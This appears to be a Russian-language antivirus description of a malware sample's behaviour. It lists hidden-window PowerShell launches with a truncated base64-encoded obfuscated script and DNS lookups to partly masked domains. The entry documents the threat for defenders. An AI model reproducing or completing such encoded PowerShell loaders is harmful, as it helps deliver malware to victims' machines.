Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABFAHkAdwByAHEAcgBkAHEAYgBtAHcAPQAnAFIAegBoAHYAdABxAHcAcgBjACcAOwAkAEoAYwB3AGgAYwBpAGwAbwB1AHQAbgAgAD...
- DNS ASK co######tboardonline.com
- DNS ASK fr###school.com
- DNS ASK sa#####ofoundation.com
- DNS ASK na#####epublickh.com
- DNS ASK wa###light.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABFAHkAdwByAHEAcgBkAHEAYgBtAHcAPQAnAFIAegBoAHYAdABxAHcAcgBjACcAOwAkAEoAYwB3AGgAYwBpAGwAbwB1AHQAbgAgAD...' (со скрытым окном)